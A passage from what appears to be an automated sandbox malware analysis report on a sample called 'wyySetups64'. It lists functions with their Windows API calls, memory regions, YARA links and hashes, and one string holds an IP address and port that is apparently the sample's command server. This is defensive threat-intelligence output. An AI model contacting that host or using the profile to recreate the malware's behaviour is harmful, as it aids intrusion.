                                                                                                                                                                                                              • Opcode Fuzzy Hash: 79ee2336c6828d91deda865a94637bcf5566ef17ad546e919a47159159bfe56a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51118470A40705AFDB109FADDC86B6EFBF4EF04705F0084AAEA59E7240EA709910C754
                                                                                                                                                                                                              Function 03371100 Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __floor_pentium4.LIBCMT ref: 0337112F
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0337115F
                                                                                                                                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03371192
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2605973128-0
                                                                                                                                                                                                              • Opcode ID: 74bb3291d6698b6050cf8a8d5e1739fc6eaaaac1e0c9ae51adb581d808654194
                                                                                                                                                                                                              • Instruction ID: 95bc239c93b7df083623349a9703ec178ec0bd39db148e232d3501e28c9a0a1c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 74bb3291d6698b6050cf8a8d5e1739fc6eaaaac1e0c9ae51adb581d808654194
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E11D371E00708AFEB20DFA9DCC6B6EFBF8FF04705F0084A9E959E6640E635A8108710
                                                                                                                                                                                                              Function 03379DE0 Relevance: 4.5, APIs: 3, Instructions: 39windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03379E04
                                                                                                                                                                                                              • GdipDisposeImage.GDIPLUS(?), ref: 03379E18
                                                                                                                                                                                                              • GdipDisposeImage.GDIPLUS(?), ref: 03379E3B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Gdip$DisposeImage$BitmapCreateFromStream
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 800915452-0
                                                                                                                                                                                                              • Opcode ID: df5748b14223d6f53a481fdde022479a82e4d1bf7b16493d324c94b91e31bbd3
                                                                                                                                                                                                              • Instruction ID: e0510abdbc46d7e2da3bbf6b0c3fd7d28461e5d3976ee7fdd0033f2daf3db09b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: df5748b14223d6f53a481fdde022479a82e4d1bf7b16493d324c94b91e31bbd3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30F08175D1021DE78B20EF98D8848AFF7B8AB49711B00465AEC05AB340D7354A05CBD0
                                                                                                                                                                                                              Function 03379AC0 Relevance: 4.5, APIs: 3, Instructions: 36COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0339FB64), ref: 03379ADC
                                                                                                                                                                                                              • GdiplusStartup.GDIPLUS(0339FB60,?,?), ref: 03379B15
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0339FB64), ref: 03379B26
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterGdiplusLeaveStartup
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 389129658-0
                                                                                                                                                                                                              • Opcode ID: 2265cd89a7d926c780034d27c39e3d8fb2a3a92d7506f39ada9627221e4cc878
                                                                                                                                                                                                              • Instruction ID: fc6f73069775432ef44f68760bb497aecc3753d8c2e6a576f981ac31db8ac6be
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2265cd89a7d926c780034d27c39e3d8fb2a3a92d7506f39ada9627221e4cc878
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1F0497194120DEFEF10EFA1E8EA7AAB7ACE704316F50029AD90496245D7B60148CAA1
                                                                                                                                                                                                              Function 00BD3200 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 15sleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                                                              • String ID: 118.107.44.219$19091
                                                                                                                                                                                                              • API String ID: 3472027048-838246116
                                                                                                                                                                                                              • Opcode ID: 7b9da5158bea4e3c36ffa86015f0e3b49a8de531e6412074f48f5d3ac501d09f
                                                                                                                                                                                                              • Instruction ID: 5e3cc0f1b6bdf1f5622f7fdad1222982a95450157dfb7c9536ee1e515acafb2a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b9da5158bea4e3c36ffa86015f0e3b49a8de531e6412074f48f5d3ac501d09f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D4D022B06645A28B8A1496019CE5C37F3F4FA8031532401DAF887873E0FBB06C08AAA1
                                                                                                                                                                                                              Function 00BD7156 Relevance: 4.5, APIs: 3, Instructions: 11threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd_noexit.LIBCMT ref: 00BD715B
                                                                                                                                                                                                                • Part of subcall function 00BD9896: GetLastError.KERNEL32(00000001,00000000,00BD7112,00BD6F0C,00000000,?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F), ref: 00BD989A
                                                                                                                                                                                                                • Part of subcall function 00BD9896: ___set_flsgetvalue.LIBCMT ref: 00BD98A8
                                                                                                                                                                                                                • Part of subcall function 00BD9896: __calloc_crt.LIBCMT ref: 00BD98BC
                                                                                                                                                                                                                • Part of subcall function 00BD9896: DecodePointer.KERNEL32(00000000,?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F,00000000,00000000,?,00BD99BA), ref: 00BD98D6
                                                                                                                                                                                                                • Part of subcall function 00BD9896: GetCurrentThreadId.KERNEL32 ref: 00BD98EC
                                                                                                                                                                                                                • Part of subcall function 00BD9896: SetLastError.KERNEL32(00000000,?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F,00000000,00000000,?,00BD99BA), ref: 00BD9904
                                                                                                                                                                                                              • __freeptd.LIBCMT ref: 00BD7165
                                                                                                                                                                                                                • Part of subcall function 00BD9A58: TlsGetValue.KERNEL32(?,?,00BD7711,00000000,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BD9A79
                                                                                                                                                                                                                • Part of subcall function 00BD9A58: TlsGetValue.KERNEL32(?,?,00BD7711,00000000,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BD9A8B
                                                                                                                                                                                                                • Part of subcall function 00BD9A58: DecodePointer.KERNEL32(00000000,?,00BD7711,00000000,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BD9AA1
                                                                                                                                                                                                                • Part of subcall function 00BD9A58: __freefls@4.LIBCMT ref: 00BD9AAC
                                                                                                                                                                                                                • Part of subcall function 00BD9A58: TlsSetValue.KERNEL32(00000025,00000000,?,00BD7711,00000000,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BD9ABE
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 00BD716E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4224061863-0
                                                                                                                                                                                                              • Opcode ID: f38e2fd3af5b98b51f4f49d36d2024edab8653c526fddae62a6e03404f1837e6
                                                                                                                                                                                                              • Instruction ID: 4b61ba8e797e92850a852b5a54a959255a432c6f95f71706ec06e38afc466901
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f38e2fd3af5b98b51f4f49d36d2024edab8653c526fddae62a6e03404f1837e6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4FC02B3100064C3BCB203732CC0E94FBECDCD80340B900052F9089A311FE30DC009551
                                                                                                                                                                                                              Function 031F01CB Relevance: 3.3, APIs: 2, Instructions: 267memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 031F022B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4119630030.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_31f0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                              • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                                                                                                                                              • Instruction ID: f7c94cfb2ca029ef69224a4c54551214c984368380daeb1f033b4fd9b0e641e0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8A14B75A00606EFDB14CFA9C880AAEF7B5FF4C304B1881A9E615DB752D770EA51CB90
                                                                                                                                                                                                              Function 00BD3350 Relevance: 3.2, APIs: 2, Instructions: 151timeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Time_memmovetime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1463837790-0
                                                                                                                                                                                                              • Opcode ID: 66e088d562f839f52fb374789110886f1d5ff61965be60db70e0ffaf254b8431
                                                                                                                                                                                                              • Instruction ID: cda2da28d869fea7f9c9a8fbb7a27161d2611c155cf13a7c7cd2cee424303c22
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66e088d562f839f52fb374789110886f1d5ff61965be60db70e0ffaf254b8431
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD51FF72700202AFC710CF69C9C0A6AF7E5FF4471471486AAE90ADB702EB35EE41CB91
                                                                                                                                                                                                              Function 03373360 Relevance: 3.2, APIs: 2, Instructions: 151timeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Time_memmovetime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1463837790-0
                                                                                                                                                                                                              • Opcode ID: b7c5ad6f09e1ea0dd3a6d2772b2ddfff78a97c783785be487dbd70d71f466809
                                                                                                                                                                                                              • Instruction ID: 9730f2ef9392c6e1a1298d99fe04535f9d7025ac22d0c4744046524108e6600b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b7c5ad6f09e1ea0dd3a6d2772b2ddfff78a97c783785be487dbd70d71f466809
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D51D57AB006059FD735CF69C8C0A6AB7A9FF44220718866CE919CB700D739F881CBD0
                                                                                                                                                                                                              Function 00BD2FB0 Relevance: 3.1, APIs: 2, Instructions: 82networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00BD3023
                                                                                                                                                                                                              • recv.WS2_32(?,?,00040000,00000000), ref: 00BD3044
                                                                                                                                                                                                                • Part of subcall function 00BD710D: __getptd_noexit.LIBCMT ref: 00BD710D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd_noexitrecvselect
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4248608111-0
                                                                                                                                                                                                              • Opcode ID: 5ace78183bb9c22f1d2806638a41c15f445a12c54b5f2e6a109ce748627fb692
                                                                                                                                                                                                              • Instruction ID: d3138144d4b6daa43d9b96c8b91c0ad5e0d1e96ce27f000bd5931f1fd843fa24
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ace78183bb9c22f1d2806638a41c15f445a12c54b5f2e6a109ce748627fb692
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64218871540208DBDB20DF64DC85B9AB7F4EF45710F1401E6E505AB396FB719E84CBA2
                                                                                                                                                                                                              Function 03372FD0 Relevance: 3.1, APIs: 2, Instructions: 82networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 03373043
                                                                                                                                                                                                              • recv.WS2_32(?,?,00040000,00000000), ref: 03373064
                                                                                                                                                                                                                • Part of subcall function 0337F91B: __getptd_noexit.LIBCMT ref: 0337F91B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd_noexitrecvselect
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4248608111-0
                                                                                                                                                                                                              • Opcode ID: 5ddd5ef2e5759e72729aabf637b57c71b4c55f5f25b7b03391aa54c7aa776b07
                                                                                                                                                                                                              • Instruction ID: 6825052d5144beea92e1c1b1fbac368a9f327f3b6d8a9f44f3f55597ea5ee510
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ddd5ef2e5759e72729aabf637b57c71b4c55f5f25b7b03391aa54c7aa776b07
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7218079A00308DBDB30EF69DCC4B9A77A8EF05320F1805A5E5459F290D7BDA984DBE1
                                                                                                                                                                                                              Function 03373260 Relevance: 3.1, APIs: 2, Instructions: 60networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • send.WS2_32(?,?,00040000,00000000), ref: 03373291
                                                                                                                                                                                                              • send.WS2_32(?,?,?,00000000), ref: 033732CE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: send
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2809346765-0
                                                                                                                                                                                                              • Opcode ID: 0ad4d2b47b55f78f805769ad2d3e365a4623bf29c9c910f2c0dcdd7fd0b2aa48
                                                                                                                                                                                                              • Instruction ID: b18eb905f8151db3b1b1c0bb31e42f25517360d39449af93e39b27f86b17d029
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ad4d2b47b55f78f805769ad2d3e365a4623bf29c9c910f2c0dcdd7fd0b2aa48
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C511E57AB05304B7C770CA6ADCC9B5AB79DFB45374F144025E908D7280D2799941A694
                                                                                                                                                                                                              Function 00BD30C0 Relevance: 3.0, APIs: 2, Instructions: 46sleeptimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: SleepTimetime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 346578373-0
                                                                                                                                                                                                              • Opcode ID: b422551574e7d581e8499aededf6be156b2051fcefb2a8906a074957c3a106ef
                                                                                                                                                                                                              • Instruction ID: 455fb9cd6a89d5af37a3b15df29fe240b95a4cfcdea0a339da63fa919e82cbb0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b422551574e7d581e8499aededf6be156b2051fcefb2a8906a074957c3a106ef
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F01B135600606AFD710DF19D8C8B6DF3E5FB59741F144265D100AB291D771AE85C7D2
                                                                                                                                                                                                              Function 033730E0 Relevance: 3.0, APIs: 2, Instructions: 46sleeptimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: SleepTimetime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 346578373-0
                                                                                                                                                                                                              • Opcode ID: a3a96ec3dea4758bf91607b63a4bd82982de5ea04fa2ff968848bb26c1badb3d
                                                                                                                                                                                                              • Instruction ID: f131b6ab22c4c02923c22b13f1b3619fc670843ae8db3a5580b197576285837e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a3a96ec3dea4758bf91607b63a4bd82982de5ea04fa2ff968848bb26c1badb3d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2101F735600609BFD321EF29CCC8BAAF7B9FB59321F184265D10487580C735A9C6D7D1
                                                                                                                                                                                                              Function 00BD6410 Relevance: 3.0, APIs: 2, Instructions: 38memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • HeapCreate.KERNEL32(00000004,00000000,00000000,?,00000000,00BD5AF2), ref: 00BD642B
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD6466
                                                                                                                                                                                                                • Part of subcall function 00BD1280: __CxxThrowException@8.LIBCMT ref: 00BD1290
                                                                                                                                                                                                                • Part of subcall function 00BD1280: DeleteCriticalSection.KERNEL32(00000000,?,00BE7E78), ref: 00BD12A1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1116298128-0
                                                                                                                                                                                                              • Opcode ID: ddf966f9e93d506bd2adfc44b066f96332e4bd5027ce3eabd708613cfb67ae1b
                                                                                                                                                                                                              • Instruction ID: ea7a2097fe2acf68ecd99f956e6736e55cc7cf92e67341d6c620a5cf528c5d9d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ddf966f9e93d506bd2adfc44b066f96332e4bd5027ce3eabd708613cfb67ae1b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83016CB0A00B409BC3209F6A9884A07FBE8FF98710B104A1EE2DAC7B10E770A445CF95
                                                                                                                                                                                                              Function 0337CD00 Relevance: 3.0, APIs: 2, Instructions: 38memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • HeapCreate.KERNEL32(00000004,00000000,00000000,0337E04E,00000000,03379800,?,?,?,00000000,0339125B,000000FF,?,0337E04E), ref: 0337CD1B
                                                                                                                                                                                                              • _free.LIBCMT ref: 0337CD56
                                                                                                                                                                                                                • Part of subcall function 03371280: __CxxThrowException@8.LIBCMT ref: 03371290
                                                                                                                                                                                                                • Part of subcall function 03371280: DeleteCriticalSection.KERNEL32(00000000,0337D3E6,03396624,?,?,0337D3E6,?,?,?,?,03395A40,00000000), ref: 033712A1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1116298128-0
                                                                                                                                                                                                              • Opcode ID: 9bd8729abb02d2d6d097c482e885cf8cd415d05664fe2a88a1aea60055e4c4b9
                                                                                                                                                                                                              • Instruction ID: 1d26c801e68a369a2b1316fd8ae9b77c80b91ae7b3ee598a9a95b220c3e49374
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9bd8729abb02d2d6d097c482e885cf8cd415d05664fe2a88a1aea60055e4c4b9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9017AB0A00B449FC330DF6A9884A07FAE8BF98700B104A1ED2DACAA10D375A105CF95
                                                                                                                                                                                                              Function 0337E480 Relevance: 3.0, APIs: 2, Instructions: 21synchronizationthreadCOMMONLIBRARYCODE
